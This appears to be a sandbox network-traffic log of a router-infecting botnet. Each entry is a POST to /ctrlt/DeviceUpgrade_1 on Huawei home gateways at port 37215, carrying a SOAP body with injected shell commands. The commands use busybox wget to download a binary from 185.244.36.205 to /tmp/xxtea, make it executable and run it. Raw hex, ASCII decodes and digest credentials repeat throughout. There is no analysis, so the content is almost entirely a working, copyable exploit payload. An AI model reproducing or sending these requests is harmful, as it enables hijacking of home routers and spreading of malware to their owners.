                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              628192.168.2.1535806138.137.201.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223726034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              629192.168.2.1541958122.204.72.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223784924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              630192.168.2.154841294.166.32.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223787069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              631192.168.2.1537358138.216.155.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223790884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              632192.168.2.155464845.48.63.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223834991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              633192.168.2.1539450197.62.140.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223887920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              634192.168.2.155836894.29.85.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223890066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              635192.168.2.1556424138.132.25.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223908901 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              636192.168.2.1551808156.80.227.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223944902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              637192.168.2.1546246138.163.187.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223964930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              638192.168.2.1545812102.187.82.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223988056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
